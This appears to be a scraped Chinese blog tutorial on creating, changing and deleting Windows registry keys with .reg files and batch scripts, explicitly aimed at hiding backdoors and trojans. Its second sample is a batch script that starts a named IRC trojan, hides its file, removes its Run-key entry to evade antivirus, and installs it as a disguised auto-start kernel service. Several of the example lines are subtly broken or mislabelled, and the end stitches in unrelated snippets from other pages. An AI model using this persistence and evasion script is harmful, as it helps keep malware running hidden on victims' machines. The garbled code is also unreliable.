在入侵過程中經常回操作登錄檔的特定的鍵值來實現一定的目的,例如:為了達到隱藏後門、木馬程式 而刪除run下殘餘的鍵值。或者建立乙個服務用以載入後門。當然我們也會修改登錄檔來加固系統或者改變系統的某個屬性,這些都需要我們對登錄檔操作有一定 的了解。下面我們就先學習一下如何使用.reg檔案來操作登錄檔.(我們可以用批處理來生成乙個reg檔案)
關於登錄檔的操作,常見的是建立、修改、刪除。
1.建立
建立分為兩種,一種是建立子項(subkey)
我們建立乙個檔案,內容如下:
windows registry editor version 5.00
[hkey_local_machine\software\microsoft
\hacker]
然後執行該指令碼,你就已經在hkey_local_machine\software\microsoft下建立了乙個名字為「hacker」的子項。
另一種是建立乙個專案名稱
那這種檔案格式就是典型的檔案格式,和你從登錄檔中匯出的檔案格式一致,內容如下:
windows registry editor version 5.00
[hkey_local_machine\software\microsoft\windows\currentversion\run]"
invader"="ex4rch"
"door"=c:\\winnt\\system32\\door.exe
"autodos"=dword:02
這樣就在[hkey_local_machine\software\microsoft\windows\currentversion\run]下
新建了:invader、door、about這三個專案
invader的型別是「string value」
door的型別是「reg sz value」
autodos的型別是「dword value」
2.修改
修改相對來說比較簡單,只要把你需要修改的專案匯出,然後用記事本進行修改,然後匯入(regedit /s)即可。
3.刪除
我們首先來說說刪除乙個專案名稱,我們建立乙個如下的檔案:
windows registry editor version 5.00
[hkey_local_machine\software\microsoft\windows\currentversion\run]
"ex4rch"=-
執行該指令碼,[hkey_local_machine\software\microsoft\windows\currentversion\run]下的"ex4rch"就被刪除了;
我們再看看刪除乙個子項,我們建立乙個如下的指令碼:
windows registry editor version 5.00
[-hkey_local_machine\software\microsoft\windows\currentversion\run]
執行該指令碼,[hkey_local_machine\software\microsoft\windows\currentversion\run]就已經被刪除了。
相信看到這裡,.reg檔案你基本已經掌握了。那麼現在的目標就是用批處理來建立特定內容的.reg檔案了,記得我們前面說道的利用重定向符號可以很容易地建立特定型別的檔案。
samlpe1:如上面的那個例子,如想生成如下登錄檔檔案
windows registry editor version 5.00
[hkey_local_machine\software\microsoft\windows\currentversion\run]
"invader"="ex4rch"
"door"=hex:255
"autodos"=dword:000000128
只需要這樣:
@echo windows registry editor version 5.00>>sample.reg
@echo [hkey_local_machine\software\microsoft\windows\currentversion\run]>sample.reg
@echo "invader"="ex4rch">>sample.reg
@echo "door"=5>>c:\\winnt\\system32\\door.exe>>sample.reg
@echo "autodos"=dword:02>>sample.reg
samlpe2:
我們現在在使用一些比較老的木馬時,可能會在登錄檔的[hkey_local_machine\software\microsoft\ windows\currentversion\run(runonce、runservices、runexec)]下生成乙個鍵值用來實現木馬的自啟 動.但是這樣很容易暴露木馬程式的路徑,從而導致木馬被查殺,相對地若是將木馬程式註冊為系統服務則相對安全一些.下面以配置好地irc木馬dsnx為例 (名為windrv32.exe)
@start windrv32.exe
@attrib +h +r windrv32.exe
@echo [hkey_local_machine\software\microsoft\windows\currentversion\run] >>patch.dll
@echo "windsnx "=- >>patch.dll
@sc.exe create windriversrv type= kernel start= auto displayname= windowsdriver binpath= c:\winnt\system32\windrv32.exe
@regedit /s patch.dll
@delete patch.dll
@rem [刪除dsnxde在登錄檔中的啟動項,用sc.exe將之註冊為系統關鍵性服務的同時將其屬性設為隱藏和唯讀,並config為自啟動]
@rem 這樣不是更安全^_^.
批處理操作登錄檔
1.新增 reg add keyname v valuename ve t type s separator d data f keyname machine fullkey 遠端機器的機器名 忽略預設到當前機器。遠端機器上只有 hklm 和 hku。fullkey rootkey subkey r...
編寫登錄檔reg檔案及批處理操作登錄檔
windows registry editor version 5.00 hkey current user software microsoft windows currentversion policies system disableregistrytools dword 00000000注意...
批處理操作登錄檔教程(上)
可以在命令列中輸入regedit來開啟登錄檔,手動進行操作。也可以直接通過批處理來進行操作。下面介紹如何通過批處理來進行登錄檔操作。一 reg add 描述 將新的子項或項新增到登錄檔中。語法 regaddkeyname v entryname ve t datatype s separator d...